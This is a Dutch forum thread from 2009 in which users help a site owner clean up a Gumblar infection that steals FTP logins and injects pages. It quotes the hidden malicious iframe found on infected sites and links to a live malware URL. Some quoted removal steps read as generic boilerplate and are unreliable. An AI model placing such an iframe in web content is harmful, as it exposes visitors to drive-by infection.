1 |
Die pagina doet niks bij mij. Niet openen, maar mn scanner zegt ook niks.quote:Op maandag 10 augustus 2009 @ 00:58 schreef Juicyhil het volgende:
En als je naar deze pagina gaat: http://zdlz.in:8080/index.php
Gaat je virusscanner dan ook stoer doen?
Hij klaagt namelijk wel over een iframe
Arghquote:Op maandag 10 augustus 2009 @ 00:59 schreef mistermaniac het volgende:
Je bent niet de enige:
Vreemd virus op mijn website?
IP's blokkeren op ftp server
Joomla als CMS?
misschien het probleem kan zijnquote:Op maandag 13 juli 2009 @ 20:42 schreef AquaMaryn het volgende:
Als jij die index er zelf niet neer hebt gezet, komt het van de server van je webhosting af. Zou in dat geval even contact opnemen met ze, want dat is nogal lomp...
Dat gaat dus enkel werken als je ook het virus verwijderdquote:Op maandag 10 augustus 2009 13:59 schreef St4ck3r het volgende:
Gumblar virus!
Veel last van hier (ISP) ff je FTP gegevens wijzigen..
Ik las het op 3 websites. Te belachelijk ookquote:Op dinsdag 11 augustus 2009 11:13 schreef MissBliss het volgende:
Format? Neeeeeeeeeeeeeeeeeeeee!
Oh, dit ga ik zo wel even doen dan.quote:Op dinsdag 11 augustus 2009 @ 11:30 schreef Qwea het volgende:
Gumblar gebruikt FTP-logins om zichzelf verder te verspreiden. Om de infectie van deze nieuwe malwarekampioen op te sporen, kunnen er een aantal stappen worden genomen:
1. Zoek het bestand sqlsodbc.chm in de systeemfolder van Windows. (Bij XP is de locatie C:\Windows\System32\)
2. Zoek de Sha1 van sqlsodbc.chm. Dit kan met FileAlyzer.
3. Vergelijk daarna de verkregen Sha1 met de lijst van ScanSafe.
4. Als de Sha1 en de grootte van het bestand niet overeenkomen zou sprake kunnen zijn van een Gumblar infectie.
ScanSafe heeft echter een radicaler advies. Het raadt een format van de harde schijf en een herinstallatie van Windows (en alle applicaties) aan als de meest effectieve manier om de Gumblar te bestrijden. Ook is het raadzaam om alle wachtwoorden te vervangen.
quote:Firstly, find another computer that is not infected. Go to your host’s control panel and change the password. If you are running a database driven site, change your database user passwords too. Backup your database – it is not clear at the moment if the database is at risk. Then, the safest option, is to delete everything in your public_html directory (or equivalent) plus html files in the tmp/webalizer and tmp/awstats directories. Ok, you lose you stats, this is not the end of the world though.
On your computer install Avast. Update Windows. If you struggle to get to the website, that’s the virus blocking you. Download from another pc, copy to media, then install from there. Update and run, run in safe mode, clear you temp data (CCleaner has always been handy for this) and run it again. Make sure you pc is clear. Reboot and run again (in case pesky virus hides and returns on reboot). Ah, before doing all that, disable Windows Restore and ensure all restore points are trashed (should be automatic).
When you computer is clear, you should be ok. As a precaution, delete all FTP passwords from all applications (even the ones you forgot about/tested years ago). I suggest that web masters stop saving FTP data on their pc’s completely. Better safe than very very sorry. Remember, Dreamweaver, Link Crawlers and Site Map generators, Photo Editors, Album Creaters and even some notepad tools (like PSPad) store FTP information.
Heb je trouwens je computers in een netwerk gedeeld staan MB? Want dan kun je alle andere pc's ook gaan scannenquote:To remove Gumblar, you must first stop any Gumblar processes that are running in your computer's memory. To stop all Gumblar processes, press CTRL+ALT+DELETE to open the Windows Task Manager. Click on the "Processes" tab, search for Gumblar, then right-click it and select "End Process" key.
To delete Gumblar registry keys, open the Windows Registry Editor by clicking on the Windows "Start" button and selecting "Run." Type "regedit" into the box and click "OK." Once the Registry Editor is open, search for the registry key "HKEY_LOCAL_MACHINE\Software\Gumblar." Right-click this registry key and select "Delete."
Finally, to completely get rid of Gumblar, you must manually remove other Gumblar files. These Gumblar files can be in the form of EXE, DLL, LSP, TOOLBAR, BROWSER HIJACK, and/or BROWSER PLUGIN. For example, Gumblar might create a file like
%PROGRAM_FILES%\Gumblar\Gumblar.exe. Locate and remove these files.
Oh dit wordt een dagtaakquote:Op dinsdag 11 augustus 2009 @ 11:38 schreef Qwea het volgende:
nog een stukje
[..]
Heb je trouwens je computers in een netwerk gedeeld staan MB? Want dan kun je alle andere pc's ook gaan scannen
Start je comps op in safe mode, en ga vanuit daar scannen. En ik zou persoonlijk alles even van het netwerk loskoppelen dmv de stekkers eruit te trekken. Allemaal in safe mode opstarten, en gaan scannen.quote:Op dinsdag 11 augustus 2009 11:41 schreef MissBliss het volgende:
Avast heeft vannacht gescand, maar hij is (weer) vastgelopen, nu scant ie weer, maar hij is pas op 58%.
Ik probeer dat McAfee ook wel!
Ja, we hebben idd een netwerkYay.
[..]
Oh dit wordt een dagtaak
Ja, dat ga ik zo maar doen.quote:Op dinsdag 11 augustus 2009 @ 11:42 schreef Qwea het volgende:
[..]
Start je comps op in safe mode, en ga vanuit daar scannen. En ik zou persoonlijk alles even van het netwerk loskoppelen dmv de stekkers eruit te trekken. Allemaal in safe mode opstarten, en gaan scannen.
quote:Op dinsdag 11 augustus 2009 11:46 schreef MissBliss het volgende:
[..]
Ja, dat ga ik zo maar doen.
Naja, Re heeft 1 vd laptops mee naar zn werkIk zal hem even bellen
Gebeld: hij is ook geinfecteerd
jaquote:Op dinsdag 11 augustus 2009 12:02 schreef St4ck3r het volgende:
<iframe src="http://c6h.at:8080/ts/in.cgi?pepsi138" width=125 height=125 style="visibility: hidden"></iframe>
Ze wisselen wel mooi af met linkjes
Dat heb ik al gezegd ja.quote:Op dinsdag 11 augustus 2009 @ 12:01 schreef Qwea het volgende:
[..]Heeft hij die laptop ook op het bedrijsnetwerk aangesloten?
Dan mogen ze wel snel actie ondernemen
Haal je dat nu van mijn site? Ik zou er niet heen gaan als ik jou wasquote:Op dinsdag 11 augustus 2009 @ 12:02 schreef St4ck3r het volgende:
<iframe data-src="http://c6h.at:8080/ts/in.cgi?pepsi138" style="visibility:hidden;" width=125 height=125 style="visibility: hidden"></iframe>
Ze wisselen wel mooi af met linkjes
Bij MM op het werk issie ookquote:Op dinsdag 11 augustus 2009 12:10 schreef MissBliss het volgende:
[..]
Dat heb ik al gezegd ja.
[..]
Haal je dat nu van mijn site? Ik zou er niet heen gaan als ik jou was
Het is mn eigen computer ja. Ik durf dit nietquote:Op dinsdag 11 augustus 2009 @ 12:11 schreef CantFazeMe het volgende:
Als je nog niet geformatteerd heb kan ik je misschien nog helpen. Formatteren altijd als een laatste optie houden. Maar het Gumblar (een redirect virus) spreidt zich inderdaad via websites en FTP. Je hoeft deze onderstaande stappen niet te volgen. (Is dit je eigen computer?) Alle tools op eigen risico.
Stap 1:
Download Trend Micro HijackThis
http://www.trendsecure.co(...)ity_tools/hijackthis
Systeem ScanOpen HijackThis. Klik op “Do a systemscan and save a logefile” Een nieuw venster in kladblok komt te voorschijn; “hijackthis.log” Kopieer de gehele log. Kopieer en plak deze log en zet het in je volgende reply. Na het kopieren van de log het programa afsluiten.
Er zijn nog meerdere stappen zodra ik je HijackThis log heb bekeken.
call gelogd bij helpdesk, responsetijd 3 uurquote:Op dinsdag 11 augustus 2009 12:03 schreef Qwea het volgende:
[..]
jahier waren er ook 2 verchillende. 1 naar .ru en 1 naar .in . En het waren totaal andere linkjes.
Ik vraag me af, hoe dit concreet opgelost gaat worden.
Zoals bovenstaand scenario.. als RE de laptop op het bedrijfsnetwerk heeft aangesloten, worden al die website's geinfecteerd... iedereen die die site's bezoekt, krijgt hem ook...
Ga je dat ooit stoppen?
3u?quote:Op dinsdag 11 augustus 2009 12:20 schreef Re het volgende:
[..]
call gelogd bij helpdesk, responsetijd 3 uur, dus ik merk het wel
Het virus dat zich zogenaamd verspreidt via Flash is wel redelijk bizar verhaal. Ik ga er aan werken.quote:Op dinsdag 11 augustus 2009 12:18 schreef MissBliss het volgende:
[..]
Het is mn eigen computer ja. Ik durf dit niet
Net belde Dizer (die heeft de site gemaakt), hij heeft pcextreme gebeld (site van die vriendin van mij die het ook heeft is daar ook gehost) maar die snappen er ook niks van.
Hij gaat iig op zijn schone computer de wachtwoorden enzo veranderen, want ik ben bang dat als ik het doe, het virus het zo weer gevonden heeft
Klopt. Zolang dat virus nog actief is in je netwerk/ op je pc.. kun je veranderen wat je wilt maar dat gaat geen ruk helpen.quote:Op dinsdag 11 augustus 2009 12:18 schreef MissBliss het volgende:
[..]
Net belde Dizer (die heeft de site gemaakt), hij heeft pcextreme gebeld (site van die vriendin van mij die het ook heeft is daar ook gehost) maar die snappen er ook niks van.
Hij gaat iig op zijn schone computer de wachtwoorden enzo veranderen, want ik ben bang dat als ik het doe, het virus het zo weer gevonden heeft
quote:Op dinsdag 11 augustus 2009 @ 12:23 schreef Dizer het volgende:
[..]
Het virus dat zich zogenaamd verspreidt via Flash is wel redelijk bizar verhaal. Ik ga er aan werken.
Zo te zien kan PCExtreme er wel wat aan doen, maar dan moet ik even wat het een en ander doen. Eerst beginnen met de ww's wijzigen.
Weer een reden om over te stappen op Apple![]()
Nee, dan blijf ik er vanaf!quote:Op dinsdag 11 augustus 2009 @ 12:24 schreef Qwea het volgende:
[..]
Klopt. Zolang dat virus nog actief is in je netwerk/ op je pc.. kun je veranderen wat je wilt maar dat gaat geen ruk helpen.
Het wachtwoord wordt nou veranderd door dizer, maar jij kan niet inloggen op de servers meer... niet eerder dan je pc's schoon zijn, anders begin je weer van vooraf aan
quote:Op dinsdag 11 augustus 2009 12:23 schreef Dizer het volgende:
[..]
Het virus dat zich zogenaamd verspreidt via Flash is wel redelijk bizar verhaal. Ik ga er aan werken.
Zo te zien kan PCExtreme er wel wat aan doen, maar dan moet ik even wat het een en ander doen. Eerst beginnen met de ww's wijzigen.
Flash en adobe reader.quote:Op dinsdag 11 augustus 2009 12:23 schreef Dizer het volgende:
[..]
quote:Wat doet Gumblar?
Het doel van de malware is om zoveel mogelijk computers te besmetten en gevoelige informatie van de deze computers te stelen. Gumblar gaat na infectie van een computer op zoek naar zogenaamde FTP-inloggegevens. FTP wordt vaak gebruikt om websites te updaten. Deze gegevens worden door Gumblar gebruikt om toegang te krijgen tot de content van allerlei (goed bedoelde) websites. Webpagina's van deze sites worden vervolgens aangepast. Bezoek je zo’n site, dan krijg je deze nieuwe malware aangeboden. Dit gebeurt opnieuw via de kwetsbare plekken in Adobe PDF Reader en Adobe Flash wanneer je zo'n website bezoekt. Op deze manier worden computers geïnfecteerd met de Gumblar code.
Ook worden er aanpassingen gedaan in Internet Explorer, de webbrowser. Deze aanpassingen zorgen ervoor dat zoekresultaten in Google worden gemanipuleerd en verwijzen naar sites waarmee malware verspreid wordt.
Naast het manipuleren van Google-zoekresultaten en het stelen van FTP-inloggegevens zal een besmette computer:
Ik vraag me af waarom vista niet.quote:Affected Platforms:
The malware affecting PCs targets prevalent Microsoft platforms:
* Microsoft Windows 2000
* Microsoft Windows XP
* Microsoft Windows Server 2003
Dat ding kan zich werkelijk overal hebben ingenesteld.quote:Op dinsdag 11 augustus 2009 12:26 schreef MissBliss het volgende:
[..]
Nee, dan blijf ik er vanaf!
Oh ja, wat ik wilde vragen: ik heb 2 versies van de site op mn pc staan, 1 op C en 1 op J. Ik upload hem altijd vanaf J. Is dan de kans groot dat het virus op J staat? Daar staan alleen foto's, muziek en die website dus, geen systeemdingen.
Nee, dat dan weer niet.quote:Op dinsdag 11 augustus 2009 @ 12:31 schreef Qwea het volgende:
[..]
Dat ding kan zich werkelijk overal hebben ingenesteld.
Doe een ctrl + alt + del... staat daar eigk een proces met iets als " gumblar" ?
Neh, je hebt avast toch? Die gaf gisteren flink lawaai toen ik op een besmette site kwam. Gewoon dan kiezen voor connectie afbreken... dan laad het iframe nietquote:Op dinsdag 11 augustus 2009 12:32 schreef MissBliss het volgende:
Ok, ook niet meer googlen in IE dus
Zal je zien, ben ik er straks na 100 jaar eindelijk vanaf, ga ik per ongeluk naar een besmette site en gebeurt het weer opnieuw
Oh sorryquote:Op dinsdag 11 augustus 2009 @ 12:34 schreef Litso het volgende:
Ouch, ik las de OP en dacht 'ff de site bekijken'. Mn pc is direct gecrashed, en ik zit op werk (internetbedrijfje). Ik hoop dat de virusscanner hier z'n werk doet, anders heb ik een probleem
Download ff avast. Ik snap het niet he...quote:Op dinsdag 11 augustus 2009 12:34 schreef Litso het volgende:
Ouch, ik las de OP en dacht 'ff de site bekijken'. Mn pc is direct gecrashed, en ik zit op werk (internetbedrijfje). Ik hoop dat de virusscanner hier z'n werk doet, anders heb ik een probleem
Ok.quote:Op dinsdag 11 augustus 2009 @ 12:34 schreef Qwea het volgende:
[..]
Neh, je hebt avast toch? Die gaf gisteren flink lawaai toen ik op een besmette site kwam. Gewoon dan kiezen voor connectie afbreken... dan laad het iframe niet
Ja, goed idee!quote:Op dinsdag 11 augustus 2009 @ 12:36 schreef Qwea het volgende:
MB? Is het handig om de TT te wijzigen?Je weet nu immers wat het probleem precies is.
Ik zeg maar wat hoor
Ooh, en zet je internet beveiliging van avast (iets met surfen ofzo in de instellingen) op hoogquote:
je bent toch niet voor jan snot modquote:Op dinsdag 11 augustus 2009 12:37 schreef MissBliss het volgende:
[..]
Ja, goed idee!
Zal ik het zelf doen?
Hij hoeft ook niet perse op jouw pc te staanquote:
Handig om daar op te klikken..quote:Op dinsdag 11 augustus 2009 12:34 schreef Litso het volgende:
Ohquote:Op dinsdag 11 augustus 2009 @ 12:46 schreef Qwea het volgende:
[..]
Hij hoeft ook niet perse op jouw pc te staanHij kan ook op die van RE staan... want toegang tot netwerk.
Ok.quote:Op dinsdag 11 augustus 2009 12:18 schreef MissBliss het volgende:
[..]
quote:Op dinsdag 11 augustus 2009 12:47 schreef Re het volgende:
homepage is iig veranderd naar goolge
ik krijg allemaal genereic FakeAlert.d!gen waarschuwingen, verder is er nog een sys.exe geinfecteerd waar de virusscan hier op kapotgaat:')
Das het mooie van een netwerk. Stel je heb 500 comps in dat netwerk, en 1 van die 500 is besmet, dan kan dat virus bij alles van het netwerk. Dus ook bij de ftp gegevens.quote:
Ga ik doen zodra avast klaar isquote:Op dinsdag 11 augustus 2009 @ 13:03 schreef CantFazeMe het volgende:
Probeer dit dan maar.
Updaten en scannen met Malwarebytes' Anti-MalwareStart MalwareBytes AntiMalware (Vista gebruikers > rechtermuisknop kies uitvoeren als Admin). Draai Malwarebytes' Anti-Malware niet in safemode, dan anders aangegeven.
Update Malwarebytes' Anti-MalwareSelecteer de "Update" tab. Klik op "Controleer Updates". Wanner het updaten klaar is, selecteer de "Scanner" tab. Klik "Volledige Scan". Wanneer het scannen voltooid is, klik op "OK", en ga naar de resultaten lijst. Bij de resultatenlijst, selecteer alles en klik op "Verwijderen". Na een succesvolle scan, een log zal automatisch worden geopend in Notepad. Kopieer en plak deze log en zet het in je volgende reply. Klik je de log om de één of andere reden weg, dan kun je hem hier weer vinden: C:\Documents and Settings\[gebuikersnaam]\Application Data\Malwarebytes\Malwarebytes' Anti-Malware\Logs
Until a few days ago, the only anti-virus software to detect and cage the virus was Avast! (one of the free ones!). Systemic, Norton and co were clueless.quote:Op dinsdag 11 augustus 2009 13:09 schreef Mr.Noodle het volgende:
Als ze gewoon even in heel het netwerk even Malwarebytes anti-malware installeren om het te detecteren en te verwijderen. Proces kan alleen wel enige uren duren als het voor meerdere machines geldt.
aVast doet hier trouwens niet veel tegen..
Die is toch ook actiefquote:Op dinsdag 11 augustus 2009 13:11 schreef CantFazeMe het volgende:
Malwarebytes werkt alleen als er een virus/trojan actief is het is geen actieve scanner. (Het kan wel, maar dan moet je ervoor betalen.)
Maar het is een zeer goed programma.
Ja, ik bedoel proactieve bescherming (voorkomen van binnendringen systeem) daarvoor moet je betalen. (optioneel natuurlijk.) (beschermingsmodule) de rest is allemaal gratis.quote:
Ja, maar dat is helemaal niet nodig. Het enige wat dat ding moet doen, is die gumblar verwijderen. Aangezien hij al actief is. En dat is gewoon gratis.quote:Op dinsdag 11 augustus 2009 13:15 schreef CantFazeMe het volgende:
[..]
Ja, ik bedoel proactieve bescherming (voorkomen van binnendringen systeem) daarvoor moet je betalen. (optioneel natuurlijk.) (beschermingsmodule) de rest is allemaal gratis.
De minilaptop heeft AVG (heet dat zo?) en die van Re weet ik niet. Minilaptop heb ik nog niet aangehad, nog geen zin inquote:Op dinsdag 11 augustus 2009 @ 13:17 schreef Qwea het volgende:
[..]
Ja, maar dat is helemaal niet nodig. Het enige wat dat ding moet doen, is die gumblar verwijderen. Aangezien hij al actief is. En dat is gewoon gratis.
Voor gewone bescherming draait ze op dr eigen pc avast.
Wat draai je eigenlijk op die andere machines MB?
Ben m aan het downloaden. Sophos vond niks, maar ik weet niet of die er al van op de hoogte is. Ik heb de helpdesk meteen maar ff ingelichtquote:Op dinsdag 11 augustus 2009 12:35 schreef Qwea het volgende:
[..]
Download ff avast. Ik snap het niet he...
Ook op MikeyMo zn werk... ze hebben daar virusscanners... en geen enkele is afgegaanterwijl hier gelijk mijn pc ging lopen schreeuwen " BAD IFRAME! VIRUS! TROJAN!"
aVast doet dan half werk, hij verwijderd het virus, maar laat de backup voorziening staan. Gevolg is bij reboot van de computer dat het virus zich uiteindelijk weer terug zet via het Windows Register en verborgen bestand ergens op de HD. Kun je weer scannen en hetzelfde proces opnieuw blijven doen. Dan blijf je bezig.quote:Op dinsdag 11 augustus 2009 13:11 schreef Qwea het volgende:
[..]
Until a few days ago, the only anti-virus software to detect and cage the virus was Avast! (one of the free ones!). Systemic, Norton and co were clueless.
verwijder ze in veilige modus? Hier ook wel eens gehad... en dan doettie het wel.quote:Op dinsdag 11 augustus 2009 13:17 schreef MissBliss het volgende:
Avast is klaar, niks gevonden
(Alleen 3 foto's die niet te scannen zijn, die zijn ook niet te verwijderen, heel raar, maar dat is al langer dus zal hier wel niks mee te maken hebben.
Nu ga ik dat malwarebytes eens proberen.
aahquote:Op dinsdag 11 augustus 2009 13:19 schreef Mr.Noodle het volgende:
[..]
aVast doet half werk, hij verwijderd het virus, maar laat de backup voorziening staan. Gevolg is bij reboot van de computer dat het virus zich uiteindelijk weer terug zet via het Windows Register en verborgen bestand ergens op de HD. Kun je weer scannen en hetzelfde proces opnieuw blijven doen. Dan blijf je bezig.
quote:Op dinsdag 11 augustus 2009 13:17 schreef Qwea het volgende:
[..]
Ja, maar dat is helemaal niet nodig. Het enige wat dat ding moet doen, is die gumblar verwijderen. Aangezien hij al actief is. En dat is gewoon gratis.
Voor gewone bescherming draait ze op dr eigen pc avast.
Wat draai je eigenlijk op die andere machines MB?
Avast zou ik sowieso als virusscanner gebruiken, maar aangezien die bij MB niks vindt, probeer ook ff die malware bytessquote:Op dinsdag 11 augustus 2009 13:19 schreef Litso het volgende:
[..]
Ben m aan het downloaden. Sophos vond niks, maar ik weet niet of die er al van op de hoogte is. Ik heb de helpdesk meteen maar ff ingelicht
Dat weet ik welquote:Op dinsdag 11 augustus 2009 13:21 schreef CantFazeMe het volgende:
[..]
![]()
![]()
![]()
Dat bedoel ik dus.(lets go back ontopic.)
Ik persoonlijk zou het heel omslachting doen (thats my middle namequote:Op dinsdag 11 augustus 2009 13:23 schreef MissBliss het volgende:
Even opnieuw opstarten, de J schijf is verdwenen
Hoe moet ik het netwerk scannen dan? De gedeelde schijven?
Netwerk scannen heeft niet echt veel zin als andere PC's ook Windows draaien. Trojans/virussen/malware nestelen zich 99% op de schijf waar Windows op geïnstalleerd is, meestal is dat door andere gebruikers niet toegankelijk via het netwerk. Tenzij de Admin erbij kan komen...quote:Op dinsdag 11 augustus 2009 13:23 schreef MissBliss het volgende:
Even opnieuw opstarten, de J schijf is verdwenen
Hoe moet ik het netwerk scannen dan? De gedeelde schijven?
Ok maar begrijp ik hieruit dat:quote:Op dinsdag 11 augustus 2009 12:30 schreef Qwea het volgende:
[..]
[..]
Flash en adobe reader.
[..]
[..]
Ik vraag me af waarom vista niet.
overigens, wat moet PCextreme hieraan doen? Als je gewoon de nieuwe adobe's hebt... loop je geen risico. PCE kan moeilijk adobe voor je gaan updaten
Trouwens, ik ben wel benieuwd naar de root login log van PC extreme. Kun je daaraan komen?
Ja. Als je het virus weghaalt, en je hebt een scanner die niet de bad iframes detecteerd (norton deed dat dus mooi niet gisteren) dan raak je opnieuw infected als je bv pietjepuk.nl bezoekt en die is besmet. Avast die ik heb, geef complete alarm bellen en dan heb je de keuze tussen doorgaan (en dus besmet worden) of de connectie afbreken zodat het iframe niet geladen wordtquote:Op dinsdag 11 augustus 2009 13:27 schreef Dizer het volgende:
[..]
Ok maar begrijp ik hieruit dat:
Je besmet bent.
Je de virus weghaald.
Je website vernieuwd
Je alsnog nog een keer besmet kan raken omdat je een website hebt bezocht die alsnog besmet is?
Wat is het leven toch heerlijk met een Mac.
mja, netwerk is hier wel redelijk goed beveiligd, hangen 25.000 computers aan ofzo, laptop ligt nu bij ITquote:Op dinsdag 11 augustus 2009 13:03 schreef Qwea het volgende:
[..]! En die helpdesk is nog steeds niet langs geweest?
Ik hoop stiekem dat je slim bent geweest en je laptop uit het netwerk hebt getrokken?
Maar je wilt niet weten hoeveel mensen die zooi nog gebruiken. Nieuwe comps worden grotendeels met mcafee geleverd.quote:Op dinsdag 11 augustus 2009 13:35 schreef Mr.Noodle het volgende:
Norton en Mcafee zijn ook logge verouderde rukprogramma's die gewoon niet voorbereid zijn op de nieuwere soorten virussen en dus hard achterlopen, maar dit was al een jaartje of 8 zo.
Nee, in adobe dus. Want via adobe komt het binnen.quote:Op dinsdag 11 augustus 2009 13:37 schreef Swetsenegger het volgende:
Maar die moet dan toch gebruik maken van een enorm gat in je browser?
Ja, het scheelt je iig (tot nu toe) dit soort frustraties..quote:Op dinsdag 11 augustus 2009 13:27 schreef Dizer het volgende:
[..]
Wat is het leven toch heerlijk met een Mac.
Via de Adobe plugins waarvan je browser gebruik maken..quote:Op dinsdag 11 augustus 2009 13:37 schreef Swetsenegger het volgende:
Maar die moet dan toch gebruik maken van een enorm gat in je browser?
Dat dus iddquote:Op dinsdag 11 augustus 2009 13:39 schreef Mr.Noodle het volgende:
[..]
Via de Adobe plugins waarvan je browser gebruik maken..
Okquote:Op dinsdag 11 augustus 2009 @ 13:25 schreef Qwea het volgende:
[..]
Ik persoonlijk zou het heel omslachting doen (thats my middle name) en die malware bytes op een schijfje zetten en individueel op alle pc's draaien .
Ja?quote:Op dinsdag 11 augustus 2009 @ 13:26 schreef Qwea het volgende:
aah, er is druk iemad bezig met je site weer ok te maken zie ik
Nou is het duidelijk dat het ftp gegevens steelt... maar in het stukje hier boven staat " wachtwoorden en gebruikers namen" dus dat geldt ook voor e-mail e.d?quote:Nieuwe kampioen
Volgens ScanSafe is Gumblar erger dan Conficker, een worm die zich verspreidt via een gat in Windows, om vervolgens namaak antivirussoftware te installeren en de echte uit te schakelen. Gumblar was de eerste twee weken van deze maand goed voor veertig procent van de malware die werd geblokkeerd door ScanSafe.
De worm gedraagt zich anders dan Conficker, hij dringt dieper binnen en onderschept en monitort het webverkeer. Daarnaast wordt er een Trojaans paard geïnstalleerd dat data zoals wachtwoorden en gebruikersnamen steelt, aldus Cnet.
Jaquote:Op dinsdag 11 augustus 2009 13:41 schreef MissBliss het volgende:
[..]
Ok
Ja goed idee wel
Oh, minilaptop heeft geen cd-romstation, kijken of het op een usb-stick past
[..]
Ja?
Ik durf er niet meer te kijken
Ik vind het ook zeer hilarisch.quote:Op dinsdag 11 augustus 2009 @ 13:42 schreef Mr.Noodle het volgende:
Stiekem ben ik toch wel weer benieuwd naar de uitkomst van dit topic, meer als in hoeveel tijd men eraan kwijt is, hoeveel frustratie het oproept en hoeveel geld er verloren omdat mensen niet normaal aan het werk kunnen..
sorry..
Oh dat, ja ik weet niet wat dat is, volgens mij gewoon het virus?quote:Op dinsdag 11 augustus 2009 @ 13:43 schreef Qwea het volgende:
[..]
Jaje site is fucked up, dus ik neem aan dat iemand ermee bezig is
Nou, erg veel tijd. Het bedrijf waar mijn vriend werkt heeft het dus ook. En die hebben dus echt veel ftp gegevens van klanten e.d. En ik geloof dat de halve afdeling nu met dat virus bezig isquote:Op dinsdag 11 augustus 2009 13:42 schreef Mr.Noodle het volgende:
Stiekem ben ik toch wel weer benieuwd naar de uitkomst van dit topic, meer als in hoeveel tijd men eraan kwijt is, hoeveel frustratie het oproept en hoeveel geld er verloren omdat mensen niet normaal aan het werk kunnen..
sorry..
Stiekem leef ik ook wel met je mee hoor..quote:Op dinsdag 11 augustus 2009 13:44 schreef MissBliss het volgende:
[..]
Ik vind het ook zeer hilarisch.
ik krijg geen bad iframe meldingquote:Op dinsdag 11 augustus 2009 13:44 schreef MissBliss het volgende:
[..]
Oh dat, ja ik weet niet wat dat is, volgens mij gewoon het virus?
Het stickje? Ja, die zal ik ook scannenquote:Op dinsdag 11 augustus 2009 @ 13:46 schreef Qwea het volgende:
[..]
ik krijg geen bad iframe melding
Trouwens, je stickje (usb) ga je in je mini laptop proppen, scan je die dan ook gelijk even mee?
je CF en SD kaartje er al uitgehaaldquote:Op dinsdag 11 augustus 2009 13:47 schreef MissBliss het volgende:
[..]
Het stickje? Ja, die zal ik ook scannen
Ja doeiquote:Op dinsdag 11 augustus 2009 @ 13:47 schreef amvrosios het volgende:
Formateren die zooi,je blijft toch altijd met rotzooi zitten,
Damn,wat ben ik blij dat er ook gwn linux bestaat!
Nu welquote:Op dinsdag 11 augustus 2009 @ 13:49 schreef Re het volgende:
[..]
je CF en SD kaartje er al uitgehaald
siquote:Op dinsdag 11 augustus 2009 13:47 schreef MissBliss het volgende:
[..]
Het stickje? Ja, die zal ik ook scannen
vind je???quote:Op dinsdag 11 augustus 2009 13:48 schreef Litso het volgende:
Wat een gruwelijk gebruiksonvriendelijk is Avast eigenlijk zeg.
iphone heeft een ander besturingssysteemquote:Op dinsdag 11 augustus 2009 13:50 schreef MissBliss het volgende:
[..]
Nu wel
iPhone ook maar?
Oh nee, das van Apple
Er staat nergens tekst, alleen een oerlelijk metallic design met een paar knoppen die niet voor zich spreken. Ik moet elke keer met mijn muis over de knoppen hoveren om te zien wat ze eigenlijk doen.quote:Op dinsdag 11 augustus 2009 13:51 schreef Qwea het volgende:
[..]
vind je???
Ik vind het echt een ideale scanner
Hehehe.. in je taakbalk, naast je klok staat een mooi avast rondje, rechtermuisknop en dan programma instellingenquote:Op dinsdag 11 augustus 2009 13:55 schreef Litso het volgende:
[..]
Er staat nergens tekst, alleen een oerlelijk metallic design met een paar knoppen die niet voor zich spreken. Ik moet elke keer met mijn muis over de knoppen hoveren om te zien wat ze eigenlijk doen.
Verder past er amper tekst in het schermpje waardoor er vanalles wordt afgekort, en kan ik nergens zien of en hoeveel bedreigingen er eigenlijk al zijn gevonden. En een 'settings' ofzo is er ook niet.
de virusscan display is gewoon een beetje ruk vind ik ook wel eigenlijk...quote:Op dinsdag 11 augustus 2009 13:58 schreef Qwea het volgende:
[..]
Hehehe.. in je taakbalk, naast je klok staat een mooi avast rondje, rechtermuisknop en dan programma instellingen
Daar heb je instellingen die je kan aanpassen
Ik zou toch malware bytes doen, gewoon voor de zekerheidquote:Op dinsdag 11 augustus 2009 14:04 schreef Litso het volgende:
Nou, avast vindt ook niks dus het zal meevallen
klopt. Maar het werkt welquote:Op dinsdag 11 augustus 2009 14:02 schreef Re het volgende:
[..]
de virusscan display is gewoon een beetje ruk vind ik ook wel eigenlijk...
Idd, ik ben blij dat ik lekker Ubuntu draai en geen gezeik heb met dit soort rare onzin.quote:Op dinsdag 11 augustus 2009 13:47 schreef amvrosios het volgende:
Formateren die zooi,je blijft toch altijd met rotzooi zitten,
Damn,wat ben ik blij dat er ook gwn linux bestaat!
Dit al geprobeerd?quote:Op dinsdag 11 augustus 2009 13:45 schreef Qwea het volgende:
[..]
Nou, erg veel tijd. Het bedrijf waar mijn vriend werkt heeft het dus ook. En die hebben dus echt veel ftp gegevens van klanten e.d. En ik geloof dat de halve afdeling nu met dat virus bezig is
Ik vind het werkelijk een KUT vrius
Komen al die linux goeroes weerquote:Op dinsdag 11 augustus 2009 14:14 schreef CasB het volgende:
[..]
Idd, ik ben blij dat ik lekker Ubuntu draai en geen gezeik heb met dit soort rare onzin.
quote:Het computer virus probleem is veel minder voorkomend op het UNIX platform, maar dat betekent niet dat het niet bestaat. UNIX virussen (hoewel erg weinig) bestaan wel degelijk. Toegevoegend, sommige van de oudste worms zijn gebaseerd op UNIX! Als je je data belangrijk vind, dan zal je deze feiten moeten accepteren.
(Noem één Linux vrius? Okay... Bliss.)
Dit gezegd te hebben, er zijn zeker (en niet verrassend) erg weinig virussen in het wild levensvatbaar op UNIX. Dit komt gedeeltelijk door toegangsrestricties in de werkomgeving. Bijvoorbeeld, als een gebruiker een geïnfecteerd bestand gebruikt, kan het alleen doen wat de gebruiker aan privileges heeft (onder normale omstandigheden-niet veel) dus op z'n minst zal het niet verspreid worden naar andere systemen. Maar als een supergebruiker (of iemand zonder enige restricties) een virus opent, kan het mogelijk het gehele system infecteren en doorgestuurd worden naar andere systemen... etc.
Ook moeten we onthouden, dat virussen onder UNIX besturingssystemen veel minder voorkomen simpel omdat dit besturingssyteem lang niet zo wijd verspreid is als DOS/Windows besturingssytemen voor thuisgebruikers. Als er meer mensen thuis gebruik zullen maken van UNIX, zullen er meer virussen hun weg zoeken. De opkomst van het GNU/Linux besturingssysteem heeft dit zeker aangetoond.
Wees gewaarschuwd, als UNIX-achtige systemen zoals GNU/Linux populairder worden en makkelijker voor thuisgebruik, zullen meer en meer onervaren gebruikers hun systeem laten opereren met volledige toegangsrechten voor allen en op die manier malware een makkelijke manier geven om hun systeem te verstoren.
Flikker op met je mac. Er staat er hier 1. Ik blijf mooi op windows.quote:
Ik kan er ook niks aan doen dat de beveiliging van Windows zo slecht is. Ik heb zelf ook wel eens last gehad van malware in Windows, en het is te belachelijk voor woorden dat de enige oplossing is dat je je pc moet formatteren.quote:Op dinsdag 11 augustus 2009 14:20 schreef Qwea het volgende:
[..]
Komen al die linux goeroes weer
[..]
Ben je mal? Ik vermaak me hier prima. Ik krijg er altijd dit gevoel bij.quote:Op dinsdag 11 augustus 2009 14:20 schreef Qwea het volgende:
[..]
